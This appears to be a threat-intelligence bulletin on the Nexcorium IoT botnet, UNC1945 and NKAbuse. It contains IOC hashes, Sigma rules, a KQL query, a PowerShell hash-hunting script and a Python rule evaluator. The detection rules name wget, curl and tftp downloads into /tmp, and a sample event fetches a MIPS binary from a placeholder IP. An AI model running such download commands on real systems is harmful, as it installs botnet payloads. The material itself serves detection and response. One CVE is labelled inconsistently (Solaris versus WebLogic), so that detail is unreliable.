Threat Summary
Current OTX pulses indicate a surge in diverse threat activities ranging from IoT exploitation to sophisticated supply-chain attacks. The Nexcorium campaign (a Mirai variant) is aggressively targeting IoT devices, specifically TBK DVRs, leveraging CVE-2024-3721 to build a DDoS botnet. Simultaneously, the UNC1945 (LightBasin) actor continues to target the financial sector via Managed Service Providers (MSPs), utilizing exploits for Oracle Solaris and Windows (CVE-2020-14871, CVE-2019-0708). Additionally, a new supply-chain vector has emerged involving the NKAbuse malware family, which exploits a critical vulnerability (CVE-2026-39987) in the Marimo Python notebook platform to deliver blockchain-based botnet malware via HuggingFace Spaces.
Threat Actor / Malware Profile
Nexus Team (Nexcorium)
- Type: IoT Botnet Operator
- Malware: Nexcorium (Mirai Variant)
- Distribution: Exploits CVE-2024-3721 (OS Command Injection) in TBK DVR devices. Uses credential brute-force for lateral movement.
- Payload: Multi-architecture binaries (ARM, MIPS, x86-64) designed for Linux/IoT environments.
- Behavior: Establishes persistence via init configurations and cron jobs. Primary objective is DDoS attack capability.
UNC1945 (LightBasin)
- Type: Advanced Persistent Threat (APT)
- Target: Finance and Consulting via MSPs
- Malware: SLAPSTICK, EVILSUN, LEMONSTICK, STEELCORGI, LOGBLEACH.
- Distribution: Third-party compromise (MSPs), exploitation of CVE-2020-14871 (Oracle WebLogic) and CVE-2019-0708 (BlueKeep).
- Behavior: Uses custom VMs pre-loaded with tools to evade detection. Capable of operating across Solaris, Windows, and Linux.
Unknown (NKAbuse/kagent)
- Type: Botnet / Crypto-abuse
- Malware: NKAbuse
- Distribution: Typosquatted HuggingFace Spaces exploiting CVE-2026-39987 (Marimo RCE).
- C2: NKN Blockchain
- Behavior: Delivered via malicious Python notebook execution. Uses blockchain infrastructure for command and control to obfuscate traffic.
IOC Analysis
The provided indicators consist primarily of file hashes (MD5, SHA1, SHA256) and CVE references.
- File Hashes: Multiple hashes for Nexcorium (IoT binaries), UNC1945 tools (Solaris/Windows payloads), and NKAbuse (Python/scripts). These should be loaded into EDR solutions to immediately quarantine matching files.
- CVEs:
    - CVE-2024-3721: Critical for IoT/Edge security teams to patch TBK DVRs.
    - CVE-2026-39987: Critical for DevOps teams using Marimo notebooks.
    - CVE-2020-14871 / CVE-2019-0708: Legacy vulnerabilities requiring patching on exposed Oracle and Windows systems.
SOC teams should operationalize these by creating watchlists in SIEMs for the hashes and configuring vulnerability scanners to flag the specific CVEs.
Detection Engineering
Sigma Rules
---
title: Potential Nexcorium Mirai Variant Botnet Activity
description: Detects behavior associated with the Nexcorium Mirai variant, including command injection exploitation patterns and downloading of multi-architecture binaries to /tmp.
references:
    - https://www.fortinet.com/blog/threat-research/tracking-mirai-variant-nexcorium-a-vulnerability-driven-iot-botnet-campaign
author: Security Arsenal
date: 2026/05/18
tags:
    - attack.initial_access
    - attack.execution
    - attack.t1059.004
logsource:
    product: linux
    service: auditd
detection:
    selection_exploit:
        cmdline|contains:
            - '/dvrdvs/sdk'
            - 'TBK DVR'
    selection_download:
        process.name|contains:
            - 'wget'
            - 'curl'
            - 'tftp'
        cmdline|contains:
            - '/tmp/'
            - '/dev/shm/'
        cmdline|endswith:
            - '.sh'
            - '.mips'
            - '.arm'
    condition: 1 of selection_*
falsepositives:
    - Legitimate administration of IoT devices
level: high
---
title: UNC1945 Suspicious Process Execution on Solaris/Linux
description: Detects execution of suspicious binaries or scripts associated with UNC1945 activity, including custom backdoors and exploitation tools.
references:
    - https://cloud.google.com/blog/topics/threat-intelligence/live-off-the-land-an-overview-of-unc1945
author: Security Arsenal
date: 2026/05/18
tags:
    - attack.defense_evasion
    - attack.t1124
logsource:
    product: linux
    category: process_creation
detection:
    selection_image:
        image|endswith:
            - '/slapstick'
            - '/evilsun'
            - '/lemonstick'
    selection_suspicious_parent:
        parent.image|contains:
            - '/java'
            - '/weblogic'
        image|endswith:
            - '/sh'
            - '/bash'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: critical
---
title: NKAbuse Blockchain C2 via Python RCE
description: Detects potential exploitation of Marimo or similar Python RCE leading to NKAbuse malware communicating with the NKN blockchain or external IPs.
references:
    - https://www.sysdig.com/blog/cve-2026-39987-update-how-attackers-weaponized-marimo-to-deploy-a-blockchain-botnet-via-huggingface
author: Security Arsenal
date: 2026/05/18
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    product: linux
    category: network_connection
detection:
    selection_python:
        process.name|contains:
            - 'python'
            - 'python3'
        destination.port:
            - 443
            - 80
        destination.ip|cidr:
            - '0.0.0.0/0' # Broad check, requires alert tuning
    filter_legit:
        destination.domain|endswith:
            - 'huggingface.co'
            - 'pypi.org'
    condition: selection_python and not filter_legit
falsepositives:
    - Legitimate Python outbound traffic
level: medium
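As an added illustration (not part of the original pulse write-up), the following Python transcribes the Nexcorium and NKAbuse selections above into a small, hypothetical Sigma-style evaluator and runs them over constructed events; it is not pySigma, the events are made up, and the field names are taken as-is from the rules.

```python
import ipaddress
# Constructed sample events (not real telemetry); the id labels the expected outcome.
EVENTS = [
    {"id": "dvr-dl", "process.name": "wget",
     "cmdline": "wget http://192.0.2.5/bins/x.mips -O /tmp/x.mips"},
    {"id": "admin", "process.name": "curl",
     "cmdline": "curl -s https://intranet.example/health"},
    {"id": "py-pypi", "process.name": "python3", "destination.port": 443,
     "destination.ip": "198.51.100.7", "destination.domain": "pypi.org"},
    {"id": "py-odd", "process.name": "python3", "destination.port": 443,
     "destination.ip": "192.0.2.44"},  # no resolved domain
]
# Selections transcribed from the Sigma rules above (same fields and values).
NEXCORIUM = {  # condition: 1 of selection_*
    "selection_exploit": {"cmdline|contains": ["/dvrdvs/sdk", "TBK DVR"]},
    "selection_download": {"process.name|contains": ["wget", "curl", "tftp"],
                           "cmdline|contains": ["/tmp/", "/dev/shm/"],
                           "cmdline|endswith": [".sh", ".mips", ".arm"]},
}
NKABUSE_SELECTION = {"process.name|contains": ["python", "python3"],
                     "destination.port": [443, 80], "destination.ip|cidr": ["0.0.0.0/0"]}
NKABUSE_FILTER = {"destination.domain|endswith": ["huggingface.co", "pypi.org"]}

def field_matches(event, spec, values):
    """One field spec ('cmdline|contains'); values are OR-ed. An absent field never
    matches, so a connection with no resolved domain is not excluded by the filter."""
    name, _, modifier = spec.partition("|")
    actual = event.get(name)
    if actual is None:
        return False
    for value in values:
        if ((modifier == "" and actual == value)
                or (modifier == "contains" and str(value) in str(actual))
                or (modifier == "endswith" and str(actual).endswith(str(value)))
                or (modifier == "cidr"
                    and ipaddress.ip_address(actual) in ipaddress.ip_network(value))):
            return True
    return False

def selection_matches(event, selection):
    """Field specs inside one selection are AND-ed, as in Sigma."""
    return all(field_matches(event, s, v) for s, v in selection.items())

def triage(events):
    """Map each rule to the ids of the events it would alert on."""
    nex = [e["id"] for e in events if any(selection_matches(e, s) for s in NEXCORIUM.values())]
    nk = [e["id"] for e in events if selection_matches(e, NKABUSE_SELECTION)
          and not selection_matches(e, NKABUSE_FILTER)]
    return {"nexcorium": nex, "nkabuse": nk}
```

The `py-odd` event shows the tuning point the rule's own comment warns about: with `0.0.0.0/0` every python connection not covered by the domain allowlist alerts, including ones whose destination never resolved to a name.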
KQL (Microsoft Sentinel)
// Hunt for Nexcorium and UNC1945 File Hashes
let IoCs = dynamic([
"aaed4dca8bd6bb42fc4efb358a02a554", "89dae116c77b0035277d39dfe01043624427c119ddee8883a3ba54a42a6ae400",
"353874dd1e12a7f67ba4f7ecbcbcb2af", "0b510f93f47590791626d2fa74ddd62ba6eb8a5a5bb7b8476c0ceffc7be94ebe",
"6983f7001de10f4d19fc2d794c3eb534", "d505533ae75f89f98554765aaf2a330a",
"2eff2273d423a7ae6c68e3ddd96604bc", "0845835e18a3ed4057498250d30a11b1",
"abaf1d04982449e0f7ee8a34577fe8af", "632be2363c7a13be6d5ce0dca11e387bd0a072cc962b004f0dcf3c1f78982a5a",
"1d36de06a6240919189cb46e0bcccc3c", "bdcb5867f73beae89c3fce46ad5185be",
"25e4b2c4bb37f125b693a9c57b0e743eab2a3d98234f7519cd389e788252fd13", "27c62a041cc3c88df60dfceb50aa5f2217e1ac2ef9e796d7369e9e1be52ebb64"
]);
DeviceFileEvents
| where SHA256 in IoCs or MD5 in IoCs or SHA1 in IoCs
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName
| extend AlertMessage = "Malicious File Hash Detected based on OTX Pulse"
PowerShell Hunt Script
# IOC Hunt Script for Nexcorium, UNC1945, and NKAbuse
# Requires Admin privileges (to read every file under C:\)
$MD5Hashes = @(
    "aaed4dca8bd6bb42fc4efb358a02a554", "353874dd1e12a7f67ba4f7ecbcbcb2af",
    "6983f7001de10f4d19fc2d794c3eb534", "d505533ae75f89f98554765aaf2a330a",
    "2eff2273d423a7ae6c68e3ddd96604bc", "0845835e18a3ed4057498250d30a11b1",
    "abaf1d04982449e0f7ee8a34577fe8af", "1d36de06a6240919189cb46e0bcccc3c",
    "bdcb5867f73beae89c3fce46ad5185be"
)
$SHA256Hashes = @(
    "89dae116c77b0035277d39dfe01043624427c119ddee8883a3ba54a42a6ae400",
    "0b510f93f47590791626d2fa74ddd62ba6eb8a5a5bb7b8476c0ceffc7be94ebe",
    "632be2363c7a13be6d5ce0dca11e387bd0a072cc962b004f0dcf3c1f78982a5a",
    "25e4b2c4bb37f125b693a9c57b0e743eab2a3d98234f7519cd389e788252fd13",
    "27c62a041cc3c88df60dfceb50aa5f2217e1ac2ef9e796d7369e9e1be52ebb64"
)

Write-Host "[+] Scanning C: drive for known malicious IoCs..." -ForegroundColor Cyan
# Walk the drive as a pipeline so the full file list is never held in memory.
# Get-FileHash returns upper-case hex; -in compares case-insensitively, so the
# lower-case lists above match. Unreadable files yield $null and are skipped.
Get-ChildItem -Path "C:\" -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
    $file = $_
    $md5 = Get-FileHash -Path $file.FullName -Algorithm MD5 -ErrorAction SilentlyContinue
    if ($md5 -and $md5.Hash -in $MD5Hashes) {
        Write-Host "[ALERT] MD5 Match found: $($file.FullName)" -ForegroundColor Red
    }
    $sha256 = Get-FileHash -Path $file.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
    if ($sha256 -and $sha256.Hash -in $SHA256Hashes) {
        Write-Host "[ALERT] SHA256 Match found: $($file.FullName)" -ForegroundColor Red
    }
}

# Check for suspicious Marimo/Notebook directories (Supply Chain Check)
$pathsToCheck = @("C:\Users\*\AppData\Local", "C:\ProgramData")
Write-Host "[+] Checking for suspicious python/marimo directories..." -ForegroundColor Cyan
foreach ($path in $pathsToCheck) {
    if (Test-Path $path) {
        Get-ChildItem -Path $path -Directory -Filter "*marimo*" -ErrorAction SilentlyContinue | ForEach-Object {
            Write-Host "[INFO] Found Marimo directory: $($_.FullName)" -ForegroundColor Yellow
        }
    }
}
Response Priorities
- Immediate:
    - Block all file hashes listed in the IOC Analysis on endpoints and gateways.
    - Patch CVE-2026-39987 (Marimo) and CVE-2024-3721 (TBK DVR) immediately if affected systems exist.
    - Block access to known typosquatted HuggingFace Spaces domains identified in threat intel.
- 24 Hours:
    - Hunt for signs of NKAbuse (suspicious Python processes connecting to blockchain IPs or non-standard ports).
    - Audit Managed Service Provider (MSP) connections and logs for UNC1945 activity (EVILSUN/SLAPSTICK).
- 1 Week:
    - Review and harden IoT device segmentation to prevent Nexcorium botnet propagation.
    - Conduct a thorough review of Oracle Solaris and WebLogic servers for UNC1945 persistence mechanisms.